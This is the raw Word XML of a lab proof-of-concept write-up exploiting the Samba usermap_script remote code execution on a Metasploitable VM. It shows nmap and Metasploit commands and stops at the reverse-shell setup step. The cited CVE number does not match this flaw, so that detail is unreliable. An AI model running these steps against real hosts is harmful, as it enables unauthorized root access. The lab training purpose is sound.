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B38E" w14:textId="304E148A" w:rsidR="001759BD" w:rsidRPr="00E748C5" w:rsidRDefault="00CD5233" w:rsidP="005F7D8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E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PROOF OF CONCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5E2840" w14:textId="44366226" w:rsidR="00CD5233" w:rsidRPr="00E748C5" w:rsidRDefault="00B1672D" w:rsidP="005F7D8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E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Usermap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Script RCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5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CD5233" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD5233" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD5233" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux 2.0.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC09728" w14:textId="77777777" w:rsidR="00CD5233" w:rsidRPr="00E748C5" w:rsidRDefault="00CD5233" w:rsidP="005F7D8C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5ED910" w14:textId="1ECCABCE" w:rsidR="00CD5233" w:rsidRPr="00E748C5" w:rsidRDefault="00CD5233" w:rsidP="005F7D8C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t>Vulnerability Brief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D5D07" w14:textId="15D5F38D" w:rsidR="00CD5233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NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Usermap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Script RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8A66E9" w14:textId="25908CB1" w:rsidR="005875FE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CVE-ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="005875FE" w:rsidRPr="00E748C5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>CVE-2015-</w:t>
        </w:r>
        <w:r w:rsidR="005875FE" w:rsidRPr="00E748C5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>0</w:t>
        </w:r>
        <w:r w:rsidR="005875FE" w:rsidRPr="00E748C5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>240</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20245772" w14:textId="5BB73137" w:rsidR="00CD5233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AFFECTED SERVICE</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SAMBA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C359D7E" w14:textId="70AED284" w:rsidR="00CD5233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AFFECTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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VERSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D501D13" w14:textId="47736A2F" w:rsidR="00CD5233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TYPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Command Execution </w:t>
      </w:r>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>via malicious username map script</w:t>
      </w:r>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39578A30" w14:textId="33641C2E" w:rsidR="00CD5233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PRIVILLEGE</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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GAINED</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A446B2" w14:textId="70342E52" w:rsidR="00CD5233" w:rsidRPr="00E748C5" w:rsidRDefault="00CD5233" w:rsidP="005F7D8C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t>AUTHENTICATION</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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REQUIRED</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D8BD01" w14:textId="77777777" w:rsidR="00CD5233" w:rsidRPr="00E748C5" w:rsidRDefault="00CD5233" w:rsidP="00E748C5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0E78874C" w14:textId="16F50AEB" w:rsidR="00CD5233" w:rsidRPr="00E748C5" w:rsidRDefault="00D75DD8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t>Target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5233" w:rsidRPr="00E748C5" w14:paraId="6772A84F" w14:textId="77777777" w:rsidTr="00CD5233">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="493BC64C" w14:textId="5E225C4F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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15332DD9" w14:textId="0B220926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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5233" w:rsidRPr="00E748C5" w14:paraId="4990F864" w14:textId="77777777" w:rsidTr="00CD5233">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34AFCDAB" w14:textId="05BB67F5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OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5771F355" w14:textId="5779A1B1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proofErr w:type="spellStart"/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Metasploitable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E748C5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Linux v2.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5233" w:rsidRPr="00E748C5" w14:paraId="6800D860" w14:textId="77777777" w:rsidTr="00CD5233">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5995FF79" w14:textId="21A6B57B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Vulnerable App</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A76BB6B" w14:textId="6CDCF4BC" w:rsidR="00CD5233" w:rsidRPr="00E748C5" w:rsidRDefault="00B1672D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 xml:space="preserve">Samba </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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Usermap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E748C5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Script RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5233" w:rsidRPr="00E748C5" w14:paraId="08916634" w14:textId="77777777" w:rsidTr="00CD5233">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0379D948" w14:textId="1B3EB5D0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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7491630A" w14:textId="4FA996A8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192.168.27.131</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5233" w:rsidRPr="00E748C5" w14:paraId="5CC66D90" w14:textId="77777777" w:rsidTr="00CD5233">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B70BF77" w14:textId="1E2BD68B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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F6E1272" w14:textId="7BF4297F" w:rsidR="00CD5233" w:rsidRPr="00E748C5" w:rsidRDefault="00B1672D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139</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17B18207" w14:textId="77777777" w:rsidR="00CD5233" w:rsidRPr="00E748C5" w:rsidRDefault="00CD5233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2EB9698A" w14:textId="04B3BAA1" w:rsidR="00CD5233" w:rsidRPr="00E748C5" w:rsidRDefault="00D75DD8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t>Attacker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5233" w:rsidRPr="00E748C5" w14:paraId="793882D7" w14:textId="77777777" w:rsidTr="002A49FE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A12A93A" w14:textId="004E4D85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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58F2E498" w14:textId="4EC61DD5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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5233" w:rsidRPr="00E748C5" w14:paraId="5DF7A1F1" w14:textId="77777777" w:rsidTr="002A49FE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08007A54" w14:textId="77777777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OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1561A4B0" w14:textId="4FFEE773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Kali</w:t>
            </w:r>
            <w:r w:rsidR="00CD5233" w:rsidRPr="00E748C5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5233" w:rsidRPr="00E748C5" w14:paraId="2A6971DF" w14:textId="77777777" w:rsidTr="002A49FE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="000C88A0" w14:textId="4324F334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Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BE20F14" w14:textId="3246CDC3" w:rsidR="00CD5233" w:rsidRPr="00E748C5" w:rsidRDefault="00D75DD8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Metasploit, Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5233" w:rsidRPr="00E748C5" w14:paraId="3E856850" w14:textId="77777777" w:rsidTr="002A49FE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A424604" w14:textId="77777777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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B84BE4D" w14:textId="0E8D75F2" w:rsidR="00CD5233" w:rsidRPr="00E748C5" w:rsidRDefault="00CD5233" w:rsidP="00E748C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E748C5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>192.168.27.13</w:t>
            </w:r>
            <w:r w:rsidR="00D75DD8" w:rsidRPr="00E748C5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C309463" w14:textId="77777777" w:rsidR="00CD5233" w:rsidRPr="00E748C5" w:rsidRDefault="00CD5233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26BEE468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2327FC70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890C5B4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15834D36" w14:textId="77777777" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C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6B9E5347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0EB347D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FD97DC5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24790A3" w14:textId="6CEA9EC3" w:rsidR="00D75DD8" w:rsidRPr="00E748C5" w:rsidRDefault="00D75DD8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lastRenderedPageBreak/>
        <w:t>Steps to exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D34230" w14:textId="1E30D70B" w:rsidR="00D75DD8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Check Host IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B2EFCC" w14:textId="397C824F" w:rsidR="0060703D" w:rsidRPr="00E748C5" w:rsidRDefault="0060703D" w:rsidP="00E748C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AA5C7DF" wp14:editId="5DC3B608">
            <wp:extent cx="5267617" cy="2837815"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635"/>
            <wp:docPr id="909628560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28560" name="Picture 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017" cy="284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868F" w14:textId="77C4D7E6" w:rsidR="00D75DD8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Check Target IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75415EE2" w14:textId="67BFD2FA" w:rsidR="0060703D" w:rsidRPr="00E748C5" w:rsidRDefault="0060703D" w:rsidP="00E748C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F70432A" wp14:editId="3609FF74">
            <wp:extent cx="5267325" cy="2470150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6350"/>
            <wp:docPr id="8071883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833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528" cy="24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6D69" w14:textId="49B0B37E" w:rsidR="00D75DD8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Check ports on target machine using following Nmap command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005F7D8C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nmap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-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sV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–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Pn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192.168.27.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6188FCA9" w14:textId="66BFE905" w:rsidR="00D75DD8" w:rsidRPr="00E748C5" w:rsidRDefault="00D75DD8" w:rsidP="00E74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sV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= service detection | Pn = skip host discovery]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE5E022" w14:textId="4B1106F7" w:rsidR="0060703D" w:rsidRPr="00E748C5" w:rsidRDefault="0060703D" w:rsidP="00E748C5">
      <w:pPr>
        <w:ind w:left="709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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C4C2127" wp14:editId="72A01A3B">
            <wp:extent cx="5267617" cy="3089275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="8928245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450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435" cy="31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C820" w14:textId="20F173A4" w:rsidR="00D75DD8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Study each possible exploitable port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E97E9FE" w14:textId="245BCFD9" w:rsidR="00D75DD8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Upon inspection, port </w:t>
      </w:r>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>139</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP contains </w:t>
      </w:r>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SAMBA</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a service which in our POC is an exploitable port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6778B887" w14:textId="63A3E4EC" w:rsidR="0054637D" w:rsidRPr="00E748C5" w:rsidRDefault="0054637D" w:rsidP="00E748C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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6F106CC" wp14:editId="5C77BA87">
            <wp:extent cx="5262007" cy="137160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8189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3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333" cy="13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722" w14:textId="66570ED9" w:rsidR="00D75DD8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Now enable Metasploit using ‘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msfconsole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>’ command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F9FA44" w14:textId="3A72EC26" w:rsidR="00B1672D" w:rsidRPr="00E748C5" w:rsidRDefault="00D75DD8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For checking the ranking and availability of the exploit run following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D3B884" w14:textId="7048AFF7" w:rsidR="0054637D" w:rsidRPr="00E748C5" w:rsidRDefault="00D75DD8" w:rsidP="00E748C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440" w:firstLine="72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search </w:t>
      </w:r>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>samba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481E4E18" w14:textId="1BDC34A8" w:rsidR="0054637D" w:rsidRPr="00E748C5" w:rsidRDefault="0054637D" w:rsidP="00E748C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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27000E00" wp14:editId="29DF7A9A">
            <wp:extent cx="5267617" cy="1038860"/>
            <wp:effectExtent l="0" t="0" r="9525" b="8890"/>
            <wp:docPr id="37536292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292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69" cy="10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1B90" w14:textId="5831D6F8" w:rsidR="00B1672D" w:rsidRPr="00E748C5" w:rsidRDefault="005875FE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Load appropriate module</w:t>
      </w:r>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B1672D" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E00B315" w14:textId="0C291CB7" w:rsidR="0054637D" w:rsidRPr="00E748C5" w:rsidRDefault="00B1672D" w:rsidP="00E748C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use exploit/multi/samba/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usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="778180F7" w14:textId="0B10C921" w:rsidR="005875FE" w:rsidRPr="00E748C5" w:rsidRDefault="005875FE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Run command ‘show options’ to see configurable settings of target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8DA26E" w14:textId="11B6356A" w:rsidR="0054637D" w:rsidRPr="00E748C5" w:rsidRDefault="0054637D" w:rsidP="00E748C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19A2A728" wp14:editId="258D7F16">
            <wp:extent cx="5262007" cy="2635885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6588727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27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183" cy="263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50E7" w14:textId="3A197A61" w:rsidR="005875FE" w:rsidRPr="00E748C5" w:rsidRDefault="005875FE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Configure target machine settings as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C7BD72" w14:textId="1DA9B144" w:rsidR="005875FE" w:rsidRPr="00E748C5" w:rsidRDefault="005875FE" w:rsidP="00E74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set RHOSTS 192.168.27.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658DBB59" w14:textId="51379A87" w:rsidR="00B1672D" w:rsidRPr="00E748C5" w:rsidRDefault="00B1672D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Configure host machine IP for reverse shell as follows:</w:t>
      </w:r>
    </w:p>
